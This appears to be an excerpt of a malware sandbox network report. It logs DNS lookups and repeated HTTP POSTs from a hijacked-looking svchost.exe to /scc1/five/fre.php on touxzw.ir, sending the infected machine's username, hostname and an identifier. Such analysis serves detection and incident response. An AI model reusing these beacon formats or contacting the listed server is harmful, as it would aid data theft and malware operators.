Feb 25, 2025 15:38:41.799588919 CET	80	50027	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:41.799671888 CET	50027	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:41.801918983 CET	50027	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:41.806842089 CET	80	50027	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:41.806916952 CET	50027	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:41.811814070 CET	80	50027	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:42.574507952 CET	80	50027	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:42.574819088 CET	50027	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:42.576241970 CET	80	50027	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:42.576303959 CET	50027	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:42.579719067 CET	80	50027	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:43.744260073 CET	50028	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:43.749324083 CET	80	50028	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:43.750968933 CET	50028	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:43.751555920 CET	50028	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:43.756556034 CET	80	50028	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:43.756690979 CET	50028	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:43.761732101 CET	80	50028	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:44.442533016 CET	80	50028	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:44.442666054 CET	50028	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:44.444010973 CET	80	50028	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:44.444075108 CET	50028	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:44.447602034 CET	80	50028	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:45.605134010 CET	50029	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:45.610205889 CET	80	50029	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:45.610352993 CET	50029	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:45.612709999 CET	50029	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:45.617666960 CET	80	50029	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:45.617769957 CET	50029	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:45.622710943 CET	80	50029	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:46.373541117 CET	80	50029	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:46.373802900 CET	50029	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:46.373863935 CET	80	50029	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:46.373924971 CET	50029	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:46.378746033 CET	80	50029	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:47.529503107 CET	50030	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:47.535598993 CET	80	50030	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:47.535804987 CET	50030	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:47.538007021 CET	50030	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:47.543085098 CET	80	50030	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:47.543150902 CET	50030	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:47.548072100 CET	80	50030	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:48.183687925 CET	80	50030	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:48.184237003 CET	80	50030	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:48.184312105 CET	50030	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:48.184747934 CET	50030	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:48.189651012 CET	80	50030	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:49.486845016 CET	50031	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:49.491815090 CET	80	50031	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:49.491935015 CET	50031	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:49.498078108 CET	50031	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:49.503001928 CET	80	50031	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:49.503055096 CET	50031	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:49.507972002 CET	80	50031	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:50.254812002 CET	80	50031	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:50.254914999 CET	80	50031	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:50.254935026 CET	50031	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:50.255008936 CET	50031	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:50.260787964 CET	80	50031	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:51.414376020 CET	50032	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:51.419332027 CET	80	50032	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:51.419430971 CET	50032	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:51.421555042 CET	50032	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:51.426775932 CET	80	50032	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:51.426845074 CET	50032	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:51.432307959 CET	80	50032	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:52.206058025 CET	80	50032	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:52.206768990 CET	80	50032	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:52.206854105 CET	50032	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:52.212899923 CET	50032	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:52.218781948 CET	80	50032	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:53.389648914 CET	50033	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:53.394743919 CET	80	50033	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:53.394849062 CET	50033	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:53.397034883 CET	50033	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:53.402199030 CET	80	50033	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:53.402370930 CET	50033	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:53.407294989 CET	80	50033	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:54.163459063 CET	80	50033	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:54.163662910 CET	50033	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:54.165023088 CET	80	50033	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:54.165086031 CET	50033	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:54.168627977 CET	80	50033	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:55.319444895 CET	50034	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:55.324395895 CET	80	50034	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:55.324487925 CET	50034	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:55.326555014 CET	50034	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:55.331613064 CET	80	50034	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:55.331665039 CET	50034	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:55.336581945 CET	80	50034	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:56.087047100 CET	80	50034	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:56.087133884 CET	80	50034	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:56.087275982 CET	50034	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:56.087275982 CET	50034	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:56.092302084 CET	80	50034	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:57.243983030 CET	50035	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:57.249039888 CET	80	50035	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:57.249145031 CET	50035	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:57.251132965 CET	50035	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:57.256212950 CET	80	50035	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:57.256280899 CET	50035	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:57.261240959 CET	80	50035	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:58.054723978 CET	80	50035	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:58.054910898 CET	80	50035	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:58.054933071 CET	50035	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:58.054968119 CET	50035	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:58.059915066 CET	80	50035	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:59.233283997 CET	50036	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:59.238698959 CET	80	50036	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:59.238830090 CET	50036	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:59.240937948 CET	50036	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:59.245927095 CET	80	50036	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:59.246009111 CET	50036	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:59.250977039 CET	80	50036	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:59.986448050 CET	80	50036	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:59.986571074 CET	80	50036	104.21.80.1	192.168.2.5
Feb 25, 2025 15:38:59.986603975 CET	50036	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:59.986687899 CET	50036	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:38:59.991734982 CET	80	50036	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:01.136874914 CET	50037	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:01.142890930 CET	80	50037	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:01.142975092 CET	50037	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:01.145091057 CET	50037	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:01.151143074 CET	80	50037	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:01.151194096 CET	50037	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:01.158181906 CET	80	50037	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:01.904460907 CET	80	50037	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:01.904643059 CET	50037	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:01.904928923 CET	80	50037	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:01.904977083 CET	50037	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:01.909518957 CET	80	50037	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:03.212579012 CET	50038	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:03.217741966 CET	80	50038	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:03.217853069 CET	50038	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:03.220135927 CET	50038	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:03.225127935 CET	80	50038	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:03.225172997 CET	50038	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:03.230072021 CET	80	50038	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:03.981158018 CET	80	50038	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:03.981302023 CET	50038	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:03.982656002 CET	80	50038	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:03.982754946 CET	50038	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:03.986284018 CET	80	50038	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:05.166873932 CET	50039	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:05.171915054 CET	80	50039	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:05.172008991 CET	50039	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:05.174199104 CET	50039	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:05.179135084 CET	80	50039	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:05.179203033 CET	50039	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:05.184097052 CET	80	50039	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:05.946638107 CET	80	50039	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:05.946773052 CET	50039	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:05.948869944 CET	80	50039	104.21.80.1	192.168.2.5
Feb 25, 2025 15:39:05.948929071 CET	50039	80	192.168.2.5	104.21.80.1
Feb 25, 2025 15:39:05.951654911 CET	80	50039	104.21.80.1	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2025 15:37:03.728617907 CET	65216	53	192.168.2.5	1.1.1.1
Feb 25, 2025 15:37:03.820872068 CET	53	65216	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 25, 2025 15:37:03.728617907 CET	192.168.2.5	1.1.1.1	0x9174	Standard query (0)	touxzw.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 25, 2025 15:37:03.820872068 CET	1.1.1.1	192.168.2.5	0x9174	No error (0)	touxzw.ir	104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 15:37:03.820872068 CET	1.1.1.1	192.168.2.5	0x9174	No error (0)	touxzw.ir	104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 15:37:03.820872068 CET	1.1.1.1	192.168.2.5	0x9174	No error (0)	touxzw.ir	104.21.64.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 15:37:03.820872068 CET	1.1.1.1	192.168.2.5	0x9174	No error (0)	touxzw.ir	104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 15:37:03.820872068 CET	1.1.1.1	192.168.2.5	0x9174	No error (0)	touxzw.ir	104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 15:37:03.820872068 CET	1.1.1.1	192.168.2.5	0x9174	No error (0)	touxzw.ir	104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 15:37:03.820872068 CET	1.1.1.1	192.168.2.5	0x9174	No error (0)	touxzw.ir	104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

touxzw.ir

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:03.834379911 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 180 Connection: close
Feb 25, 2025 15:37:03.839421034 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons347688ALFONS-PCk0FDD42EE188E931437F4FBE2CDcmyU
Feb 25, 2025 15:37:04.607664108 CET	820	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyuiIlX64GJyz%2FqqhT%2FPZbP%2B7Sw%2FfycEQR4Q%2BOS%2F7SDMyP5GTymgHM7WrUhFXM9XfTUNbCZAWt8bFYGrz6PvsGg1OaoNzY9dHk%2BvZe3Yd6BjFXo4GhCy4mvyYCI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786e657ba372b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2124&min_rtt=2124&rtt_var=1062&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=419&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:05.879350901 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 180 Connection: close
Feb 25, 2025 15:37:05.884394884 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons347688ALFONS-PC+0FDD42EE188E931437F4FBE2CzC5T5
Feb 25, 2025 15:37:06.603734016 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:06 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ty9BE5ytEifKkHhSBpctXb8kRNzupy2ZJ1dQ%2FQEam%2Be16Mn3ftZfx98yyeTPQkKLjO%2BYMFRgvsEuUEGGN2h53oU%2BLQYFvLX2jSho6aZzMoSbyrx%2B0MvElfdGDTI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786e724c4f0f3f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1503&rtt_var=751&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=419&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:06.672959089 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:06.678042889 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:07.419003963 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:07 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2FYbGvf7z8rnfw3xEGi8DiQBRN0PRYYwKBkgGtqQhrxBogkmoCW0%2B845j540WHXd0ODtdxPW5ORz0jgZarkvpEFSrlM6yuJaPGr6evyxhNfaZ%2F3G%2FgZSy3Pq%2FZc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786e77492a1869-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1663&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:08.641653061 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:08.646573067 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:09.420542002 CET	850	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LsP5XDFuUDeHwcdBLZfqqb%2BU1E4KVO8%2Fwq%2BChAnpgcRpfwmhdN8DjBVLJwXn0GlNRDiehufTtH3IjFY%2Fonv9fKXC5mDAP8Ls%2F%2Bl8Yay%2Bh19Q6edAWF5wFP16IxI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786e839b5e727d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1987&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:10.577058077 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:10.582091093 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:11.351828098 CET	847	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2I7UPVy3UGxsbRhIICyDk3czqfa%2FRN1uW2%2By%2Fw80Br6yftCuhdR0acTvkdruxlsjnVqII78GeCvpYtMpDC34FOqwNhQx%2B1UT58V3UUkPDaxvHKyzF1%2BgjugiFnc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786e8fadec424f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2159&min_rtt=2159&rtt_var=1079&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:12.496712923 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:12.501734018 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:13.245565891 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:13 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fX27GRsalxVWps2tSwD41e3tOhySpOwtdweyLsVMe3SpXjKqXHtvH2d6p42Y%2FIZdQejBCluLNGmG25WBLCjaf1QXbmnAsAaBiyyF0Iw%2FeCLSw2pl8LzafNE9RWE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786e9baf7ec3ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1722&rtt_var=861&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:14.418770075 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:14.423788071 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
